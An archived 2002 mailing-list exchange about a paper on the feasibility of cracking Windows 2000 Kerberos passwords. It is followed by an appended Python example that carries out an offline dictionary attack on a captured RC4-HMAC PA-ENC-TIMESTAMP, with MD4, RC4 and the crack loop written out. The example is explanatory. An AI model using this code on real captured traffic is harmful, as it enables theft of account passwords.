Paper: Feasibility of attacking Windows 2000 Kerberos Passwords

Frank O'Dwyer fod at brd.ie
Wed Mar 6 15:41:51 EST 2002


"Nicolas Williams" <Nicolas.Williams at ubsw.com> wrote in message
news:20020306113507.D27171 at sm2p1386swk.wdr.com...
> Your paper is about the usage of keys derived from weak passwords in
> Kerberos V.  It is not specific to Windows 2000.

Maybe you think I should have written about the general problem, but I
didn't. You can if you like. What I did write about was whether this has any
practical significance in the concrete Kerberos implementation that the
majority of people will find themselves confronted with, i.e. W2K.

Since I wanted to write a practical paper that would raise awareness of this
issue in W2K, my paper concerns itself with the actual on-the-wire stuff in
W2K, the actual string2key and encryption methods etc., the concrete
Kerberos choices that were made in W2K. I don't mean to imply that these
choices were any worse than those of other implementations; the problem is
that they were no better.

I have already pointed out, here and in the paper, that the basic
vulnerability is not news, and not unique to the Microsoft implementation,
but stems from an old Kerberos V design flaw that has been imported into
W2K. And, so what? That fixes it, does it?

Cheers,
Frank.

> On Wed, Mar 06, 2002 at 03:55:41PM +0000, Frank O'Dwyer wrote:
> > "Nicolas Williams" <Nicolas.Williams at ubsw.com> wrote in message
> > news:20020306094804.C27171 at sm2p1386swk.wdr.com...
> > > You know it's not just Windows 2000 that uses PA-ENC-TIMESTAMP.
> > >
> > > So why the title?
> >
> > I couldn't see any reason to break with the tradition of naming the
> > paper after what it is about, hence the title :)
> >
> > The paper is not about PA-ENC-TIMESTAMP, or other implementations of it,
> > it's about the feasibility of getting somewhere in a real-world
> > situation against W2K Kerberos. It's not even exhaustive as far as that
> > scope goes.
> >
> > Obviously the attack does apply to, in fact has been derived from,
> > attacks on other krb5 implementations using the timestamp with other
> > encryption methods. Actually I did not know for sure that W2K used
> > PA-ENC-TIMESTAMP, or even if it used the standard AS protocol at all
> > until I looked into it.
> >
> > Cheers,
> > Frank.
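
The "feasibility" the thread is arguing about, as an added worked example
that is not part of the original post or of O'Dwyer's paper: an offline
dictionary attack on a captured PA-ENC-TIMESTAMP pre-authenticator. The post
above only refers to "the actual string2key and encryption methods" without
naming them; the example assumes the W2K enctype is RC4-HMAC as specified in
RFC 4757, whose string2key is MD4 over the UTF-16LE password (i.e. the NT
hash) and whose key usage for PA-ENC-TIMESTAMP is 1. The password, the
timestamp, the wordlist and the "captured" blob are all constructed here;
extracting the blob from the ASN.1 of a real AS-REQ is left out. MD4 is
implemented inline because hashlib builds on OpenSSL 3 often ship it only in
the legacy provider.

```python
# Added example (not from the original post or O'Dwyer's paper): offline
# dictionary attack on a Kerberos V PA-ENC-TIMESTAMP as W2K sends it.
# Assumptions: enctype rc4-hmac (RFC 4757), string2key = MD4(UTF-16LE(pw)),
# key usage 1 for the pre-auth timestamp. All inputs below are constructed.
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF
KU_AS_REQ_PA_ENC_TS = 1          # RFC 4120 key usage for PA-ENC-TIMESTAMP


def _rot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (little-endian words), as rc4-hmac string2key requires."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, tuple(range(16)), (3, 7, 11, 19), 0),
        (g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (h, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = [a, b, c, d]
        for fn, order, shifts, const in rounds:
            for i, k in enumerate(order):
                t = (-i) % 4                       # target register cycles a, d, c, b
                p, q, r = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
                v[t] = _rot((v[t] + fn(p, q, r) + x[k] + const) & MASK, shifts[i % 4])
        a, b, c, d = (a + v[0]) & MASK, (b + v[1]) & MASK, (c + v[2]) & MASK, (d + v[3]) & MASK
    return struct.pack("<4I", a, b, c, d)


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def string2key(password: str) -> bytes:
    """rc4-hmac string2key: MD4 over the UTF-16LE password, identical to the NT hash."""
    return md4(password.encode("utf-16-le"))


def rc4hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes = None) -> bytes:
    """RFC 4757 section 5: checksum || RC4(K3, confounder || plaintext)."""
    confounder = confounder or os.urandom(8)
    k1 = hmac_md5(key, struct.pack("<I", usage))      # T = little-endian usage
    checksum = hmac_md5(k1, confounder + plaintext)   # K2 == K1 (non-export variant)
    k3 = hmac_md5(k1, checksum)
    return checksum + rc4(k3, confounder + plaintext)


def rc4hmac_decrypt(key: bytes, usage: int, ciphertext: bytes):
    """Plaintext without confounder, or None when the checksum does not verify."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    checksum, body = ciphertext[:16], ciphertext[16:]
    plain = rc4(hmac_md5(k1, checksum), body)
    if not hmac.compare_digest(hmac_md5(k1, plain), checksum):
        return None
    return plain[8:]


def pa_enc_ts_enc(ts: str) -> bytes:
    """Minimal DER for PA-ENC-TS-ENC ::= SEQUENCE { patimestamp [0] KerberosTime }."""
    gt = bytes([0x18, len(ts)]) + ts.encode("ascii")          # GeneralizedTime
    ctx0 = bytes([0xA0, len(gt)]) + gt                         # [0] EXPLICIT
    return bytes([0x30, len(ctx0)]) + ctx0                     # SEQUENCE


def crack_pa_enc_timestamp(ciphertext: bytes, wordlist):
    """Try each guess offline: the checksum alone tells us whether the key was right,
    so no KDC traffic, and hence no lockout policy, is involved."""
    for guess in wordlist:
        plain = rc4hmac_decrypt(string2key(guess), KU_AS_REQ_PA_ENC_TS, ciphertext)
        if plain is not None and plain[:1] == b"\x30":          # also looks like a SEQUENCE
            return guess
    return None


# Constructed demo data: a weak password and a pre-authenticator "sniffed" for it.
DEMO_PASSWORD = "Summer2002"
DEMO_WORDLIST = ["password", "letmein", "Winter2001", "Summer2002", "Autumn2002"]
DEMO_PA_DATA = rc4hmac_encrypt(string2key(DEMO_PASSWORD), KU_AS_REQ_PA_ENC_TS,
                               pa_enc_ts_enc("20020306154151Z"))

if __name__ == "__main__":
    print("rc4-hmac key (NT hash) of 'password':", string2key("password").hex())
    print("recovered password:", crack_pa_enc_timestamp(DEMO_PA_DATA, DEMO_WORDLIST))
```

The point of the example is the cost model: the checksum comparison in
rc4hmac_decrypt is the whole oracle, so each guess costs one MD4, three
HMAC-MD5 computations and an RC4 pass over a few dozen bytes, all computed
from a single captured AS-REQ with no further contact with the KDC. The
plaintext-shape check is only a second opinion; the HMAC already settles it.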
